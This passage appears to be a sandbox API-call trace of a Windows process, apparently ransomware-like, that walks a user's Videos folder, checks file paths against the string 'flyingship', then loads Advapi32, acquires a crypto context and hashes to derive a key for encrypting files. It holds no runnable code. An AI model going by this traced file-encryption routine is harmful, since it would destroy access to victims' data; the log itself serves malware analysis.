cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jYTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YTdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tdy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dy7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DTgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TgQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQ 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n_RHA.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.497] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0194.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0194.497] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0194.497] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0194.497] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0194.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0194.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0194.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.497] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0194.498] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0194.498] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0194.498] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0194.498] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0194.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0194.498] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.swf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d91460, ftCreationTime.dwHighDateTime=0x1d5e6a1, ftLastAccessTime.dwLowDateTime=0x45eed560, ftLastAccessTime.dwHighDateTime=0x1d5e2d1, ftLastWriteTime.dwLowDateTime=0x45eed560, ftLastWriteTime.dwHighDateTime=0x1d5e2d1, nFileSizeHigh=0x0, nFileSizeLow=0x1418f, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="-4jYTdy7DTgQ 7n_RHA.swf", cAlternateFileName="-4JYTD~1.SWF")) returned 0x90ae18 [0194.499] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0194.499] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0194.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0194.499] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.499] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0194.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0194.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.499] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0194.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0194.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0194.499] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0194.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0194.500] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0194.500] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.500] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.500] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0194.500] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0194.500] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.500] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0194.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0194.501] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0194.501] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.501] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0194.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0194.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0194.501] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0194.503] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0194.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0194.503] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0194.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.503] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0194.503] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.504] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.504] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.504] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0194.504] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0194.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0194.504] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0194.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0194.505] 